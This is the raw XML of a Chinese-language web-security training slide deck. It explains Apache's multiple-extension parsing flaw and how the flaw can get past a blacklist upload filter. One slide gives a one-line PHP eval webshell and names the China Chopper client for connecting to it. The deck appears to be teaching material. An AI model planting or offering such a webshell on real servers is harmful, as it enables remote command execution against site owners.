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6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CC1A9-12CA-4917-9EE6-6D68CA611841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65384-4021-4CE7-BB72-A1B102F2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5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F7726-18BF-4C85-8B0D-025348D8E22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D8B0-93E1-4B85-8EF1-1C686FDADD7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AE89-B43B-40D0-84DA-50032B0F8F1E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F3CB-AB03-43DA-84F7-6C7BE7784437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F3286-CEA5-4D29-9C53-41E6034B7C26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BF852-A02F-4439-8553-D33EF1FBEAA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FC617-359E-4B8E-A961-91C4D1F97995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3869D-32FB-49EA-A475-56711DC793F5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3DCA7-6CFF-4983-993F-654397F1DE5E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C4F75-F04E-4A16-8A9D-E04FD9B8306A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FBA75-AE7F-4748-AA88-F95ED9EE7AF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B5A83-F2DB-4A09-B33F-668A6158E53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C9EF4-529A-46CC-8619-AC529C78E1F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B1741-55C6-4714-BCAF-73421E766D5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D8096-DA41-4CAD-BCEB-E1A7F5E38C5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D45C4-F6CC-4E1A-A040-0FC38476074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7AE95-4EE6-4E68-9B5B-0297AAF00E9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415B8-F099-4912-8ABD-9505C9FD864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D201F-1080-4EA8-B64C-C9D4DE973B2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A6B09-AEB2-4C98-A39F-67BA10148ADE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5DB29C-AF42-402C-9A68-C28870DA2F5B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72D380-52E2-4D71-9EEC-DE76C72C7F7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Apache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文件解析漏洞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82BD087-5F5A-4D18-AFF0-347FEEA3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59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利用场景介绍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34493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程序中存在文件上传，但是有黑名单验证时，利用该解析漏洞可以上传对应的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Webshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>到目标服务器。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23088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上传一句话  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;?php @eval($_POST[“cmd”]); ?&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>用中国菜刀连接。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2900045"/>
            <a:ext cx="9937750" cy="323850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91094-1716-4953-848B-8B60541A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70685" y="2886075"/>
            <a:ext cx="4652010" cy="1489075"/>
            <a:chOff x="4298950" y="2274888"/>
            <a:chExt cx="46520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926522" cy="549275"/>
              <a:chOff x="3702051" y="2081213"/>
              <a:chExt cx="39265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3566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Apache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环境搭建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678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Apache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解析漏洞介绍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4038600" cy="1458912"/>
            <a:chOff x="4298950" y="4113213"/>
            <a:chExt cx="40386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4544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解析漏洞利用演示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利用场景介绍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9F57BD-135D-4D61-AA5E-F16E9611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再见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9B07A6-6FDA-4F95-AB1D-2C384A5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70685" y="2886075"/>
            <a:ext cx="4652010" cy="1489075"/>
            <a:chOff x="4298950" y="2274888"/>
            <a:chExt cx="46520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926522" cy="549275"/>
              <a:chOff x="3702051" y="2081213"/>
              <a:chExt cx="39265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3566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Apache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环境搭建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0678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Apache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解析漏洞介绍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4038600" cy="1458912"/>
            <a:chOff x="4298950" y="4113213"/>
            <a:chExt cx="40386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4544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解析漏洞利用演示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利用场景介绍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D43890-AF6A-4D7B-9746-04DF82E8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环境搭建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0A12506-3B20-4BE8-8627-B7B3DD6E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5403" y="594677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环境搭建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2635" y="13944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Apache </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>和 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采用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>module</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>的方式结合。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30" y="1762760"/>
            <a:ext cx="7977505" cy="4924425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8A84C-FB93-4C78-8742-D697AFB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解析漏洞介绍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2F0ED69-F810-45BB-86D2-CC10F718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Apache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解析漏洞介绍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chemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>因为Apache认为一个文件可以拥有多个扩展名，哪怕没有文件名，也可以拥有多个扩展名。Apache认为应该从右到左开始判断解析方法的。如果最右侧的扩展名为不可识别的，就继续往左判断，直到判断到文件名为止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1540" y="24511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官方解释：</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://httpd.apache.org/docs/current/mod/directive-dict.html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2889250"/>
            <a:ext cx="8936355" cy="383540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3FBCF-9841-4645-A277-CB895BF2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68395" y="3081655"/>
            <a:ext cx="48552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解析漏洞利用演示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D63E7B5-080C-4C15-8CD8-B8E82F6D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解析漏洞利用演示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在站点目录下新建一个 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1.php.xxxx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>文件，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xxxx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>文件后缀名为无法识别的后缀名。其中内容为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>phpinfo();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1908810"/>
            <a:ext cx="11150600" cy="4756150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727BB62-D67A-45DB-8C6D-5BD31B7A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利用场景介绍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A9AC5AA-EB5E-403F-9328-BB6E330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Adobe Gothic Std B</vt:lpstr>
      <vt:lpstr>等线</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Impact</vt:lpstr>
      <vt:lpstr>1_Office 主题</vt:lpstr>
      <vt:lpstr>2_Office 主题</vt:lpstr>
      <vt:lpstr>Web攻防 训练营</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>Apache环境搭建</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>Apache解析漏洞介绍</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>解析漏洞利用演示</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>利用场景介绍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Web攻防 训练营</dc:title>
  <dc:creator/>
  <cp:lastModifiedBy>MC Y</cp:lastModifiedBy>
  <cp:revision>148</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-08-20T13:57:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-10-17T09:46:44Z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